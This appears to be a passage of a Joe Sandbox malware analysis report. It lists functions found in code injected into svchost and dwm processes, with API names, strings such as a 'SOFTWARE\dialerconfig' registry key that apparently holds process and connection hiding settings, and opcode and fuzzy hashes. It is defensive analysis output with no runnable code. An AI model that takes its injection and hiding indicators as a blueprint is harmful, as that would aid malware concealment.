                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 9bf27a7e66860d5ed9a1e4fc62765c01fea6d54f0cf7a99623ebd25812deed3f
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: FFF01C75715F8882FB158F97B92419967E2AB48FD1F089131EE4A67F28DF3CC4868710
                                                                                Function 00000195DD5CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: 6fff49532d995f645c10438cf692a88e56ff7661239a114b43dcc12d8e254882
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 9BF09675311F0981EF118BA8E46439963E2EB857A1F540219CA6A56BE4DF3CC546C310
                                                                                Function 00000195DD5C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: a3c0edd0877988b553c5cb3f44ac1cf59b63286ea202ec1d8159712ba189bc8b
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: 7402A83221AB8486E761CB99E4A479EB7E1F3C4794F104115EA8E97FA9DF7CC484CB00
                                                                                Function 00000195DD5C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: c54ef34d66bd00901bd8adbac774be78d0448155a515a9e92ef6434a46babdc8
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: 5561EB3661AF48C6E761DB9AE46475AB7E2F388784F500115EA8E97FA8DB7CC440CF40
                                                                                Function 00000195DD5D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 4f18cf734432864d1cadb05385a9f61388192ac32121d651ae8f93e19ceaa8fb
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 38115132A10F9131FB6615E8D4763E611DB6B683F8F180724A97636FD68A24C8414721
                                                                                Function 00000195DD5A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 33dfdcfffdc3893784a7b309723e3667eaa1db39b5b3fd1c14ced88943099ce3
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 0111E332A10F3141FBA691ECE4753E91AC36F5C37CF49A638A96626ED6CA2CF8405700
                                                                                Function 00000195DD59F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: e363e31868ba0ebea0856da9f2af10226048556fbf55e11a4800ee541c068533
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 3261D53A600E40C2FB6BCBE4E9703EE2AE3E785780F554415CA5A37FA4DB34D8499B40
                                                                                Function 00000195DD5CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                                • Instruction ID: 14cf2eee4fbcc911eae32f8475549afe507b7b7c46814838016a04d8a23f088c
                                                                                • Opcode Fuzzy Hash: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                                • Instruction Fuzzy Hash: DD614932602A888AEB21DFA9D4503DD7BE2F354B8CF045215EF4967B98DB39D595C700
                                                                                Function 00000195DD5CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 2a90534c08ec7fa08356974faa6f23fad74bcd69915b4cf882117b33a0582183
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: A451E076101B88CAEB768FA994A43D87BE2F355B85F184116DA89E7FD5CB39C490CB00
                                                                                Function 00000195DD59A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 630a7bd136e047a971954e7c30b8e6e87b54a1208c2d6339fb40a23e9a14be36
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 9351AA32100B80CAEF768BA5946439877E2F355BC4F189216DB99A7FD5CB3AD490CF10
                                                                                Function 00000195DD598405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 545615c7cb5cd5622a5ac668a3e3931a1a855b43902fdb1261379489e8260ddb
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5F51D132701A00DBEB56CF55E464B983BEAF354BA8F548164DA1A67B88EB35D844CF04
                                                                                Function 00000195DD5983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 1a57b68ce290c85dbce40ecbe3ad1d13c9711456f6542ae40eb2b2b77e126871
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 1F31DF32201B40EAE716DF61E864B997BEAF744BD8F058054EE5B67F88DB39D940CB04
                                                                                Function 00000195DD5D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                                • Instruction ID: f53c85bc1b1823a42c19dddbaacf5ef3270f7fc8b13c31205dca382023514cf5
                                                                                • Opcode Fuzzy Hash: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                                • Instruction Fuzzy Hash: 84D1FE32B15A8089E712CFB9D4607EC3BF2F755BA8F008216DE5AA7F99DA34C406C350
                                                                                Function 00000195DD5C14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: c16a99b6eb882b57aedd9fd2cb972f0c73c4406802b17b7f20f8a29f0fc28702
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 45015A32601F99D6E705DFE6E95418A77E2FB89F81F044425EA4A63B29DE38C052C750
                                                                                Function 00000195DD5D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                                • Instruction ID: d41248d40368a7dadbb8de4372f2d467b08f8f1214df69f873c535610b2736e1
                                                                                • Opcode Fuzzy Hash: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                                • Instruction Fuzzy Hash: 1D91CE32704E5499F7629FA994A0BED3BE2F754B88F144109DE4A77F98DB74C882C720
                                                                                Function 00000195DD5C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: ef2a4aaacd16aa62e41bbfaf996d134d739e1b6477f4088ce6822e44ce878a86
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 32113C36710F058AEB10DFA0E8643E833E4F719759F440E21DA6D96BA4DF78C1998380
                                                                                Function 00000195DD5C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                                • Instruction ID: 4b390bd35bc8d7488896d564d2b09490878af5546f8c74a14ac6cebee34a4a91
                                                                                • Opcode Fuzzy Hash: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                                • Instruction Fuzzy Hash: 9371B436301F8986E726DFAD98A47EA77D6F389B84F480026DD09A3F89DE39C545C700
                                                                                Function 00000195DD599E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 963f06e7ef80a2670a9323d7792bb0635a5f70e1dcd725eb12c0e0c54d3360cc
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: F4614636A00B84CAEB22DFA5D4903DD7BE2F349B88F045215EF4927B99DB38D595CB40
                                                                                Function 00000195DD5C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                                • Instruction ID: 6ad79f3c6496f576d1a9b3784531bf2f01e420446c3f4c2c03693f52336387d6
                                                                                • Opcode Fuzzy Hash: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                                • Instruction Fuzzy Hash: CB511632206B8982F736DBAEA0B87EA77D3F386740F480125DD49A3F49DA39C505C740
                                                                                Function 00000195DD5D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: bf4803890842cdcd72fcab1033f968f229dce80172f82f9c58987f86f410db74
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 3741AF32715B8482EB219FA5E8547EAA7E2F798794F504021EE4D97B98EF3CC441CB50
                                                                                Function 00000195DD5C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                                Function 00000195DD597356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                                Function 00000195DD5973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                                Function 00000195DD5C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                                Function 00000195DD5C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                                Executed Functions

                                                                                Function 000001160CA11628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 26355f59f2fbcf859f9fdb7bfac8618af794a1f004d759b0c7ff34932e116d24
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 90710976711B5086EB149F6AE8A0ADD63A4F788B88F405161FF4E47B6DDF36C884C740
                                                                                Function 000001160CA13790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 47b80caba1b0aab0240aea7a35e498d0921ec3c92e713c1e0b924a5b7fe9d153
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 04115235706B91C2EF189F1AE4182E96260F74CB85F444065FF8907768EF3EC985C704
                                                                                Function 000001160CA15B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
